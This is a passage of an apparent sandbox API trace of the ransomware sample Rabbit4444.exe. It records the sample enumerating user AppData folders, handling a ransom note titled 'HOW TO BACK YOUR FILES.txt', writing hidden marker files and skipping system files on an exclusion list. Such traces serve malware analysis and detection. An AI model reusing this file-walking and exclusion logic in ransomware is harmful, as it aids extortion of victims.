dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.508] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.508] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.508] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.508] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.508] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152db4f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefc49657, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.508] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.508] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.509] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.509] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.509] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.509] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc49657, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc49657, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc49657, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.509] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.509] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.509] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc49657, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc49657, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc49657, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.509] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.509] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.510] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.510] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.510] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.510] CloseHandle (hObject=0x2a0) returned 1 [0064.510] CloseHandle (hObject=0x2cc) returned 1 [0064.510] GetCurrentThreadId () returned 0xd98 [0064.510] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0064.510] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData" [0064.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124028 | out: hHeap=0xe0000) returned 1 [0064.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0064.510] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData" [0064.511] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\" [0064.511] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0064.511] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.512] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.514] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.515] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.515] CloseHandle (hObject=0x2cc) returned 1 [0064.515] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData") returned 84 [0064.515] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.515] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0fb524, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152d29c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefc6f8c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0064.516] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.516] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.516] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.516] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.516] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0fb524, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152d29c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefc6f8c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.516] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.516] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.516] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.516] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.516] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.516] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc6f8c6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc6f8c6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc6f8c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.516] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.516] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.516] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc6f8c6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc6f8c6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc6f8c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.516] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0064.516] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.517] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.517] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.517] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.517] CloseHandle (hObject=0x2a0) returned 1 [0064.517] CloseHandle (hObject=0x2cc) returned 1 [0064.517] GetCurrentThreadId () returned 0xd98 [0064.517] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0064.517] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC" [0064.517] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121b00 | out: hHeap=0xe0000) returned 1 [0064.517] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0064.517] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC" [0064.517] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\" [0064.517] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0064.517] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.522] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.525] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.526] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.526] CloseHandle (hObject=0x2cc) returned 1 [0064.526] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC") returned 79 [0064.526] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.526] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea147891, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x37de8088, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xefc6f8c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0064.527] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.527] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.527] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.527] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.527] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea147891, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x37de8088, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xefc6f8c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.527] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.527] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.527] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.527] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.527] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.527] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefc6f8c6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefc6f8c6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefc95abf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.527] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.527] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.527] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152ab04, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea16dae4, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0064.527] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0064.527] lstrcpyW (in: lpString1=0x130ebd8, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0064.527] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0064.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0064.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x123080 [0064.528] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x11cd28 [0064.528] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152b40a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea16dae4, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0064.528] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0064.528] lstrcpyW (in: lpString1=0x130ebd8, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0064.528] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0064.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122020 [0064.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x122cc0 [0064.528] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122028 | out: ListHead=0xf68b0, ListEntry=0x122028) returned 0x122108 [0064.528] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152bdcc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea16dae4, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0064.528] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.528] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.528] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0064.528] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0064.529] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0064.529] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0064.529] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0064.529] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0064.529] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0064.529] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0064.529] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0064.529] lstrcpyW (in: lpString1=0x130ebd8, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0064.529] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0064.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0064.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x122d80 [0064.529] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x122028 [0064.529] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152c735, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea16dae4, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0064.529] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0064.529] lstrcpyW (in: lpString1=0x130ebd8, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0064.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0064.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x1240e0 [0064.529] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x122168 [0064.530] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152c735, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xea16dae4, 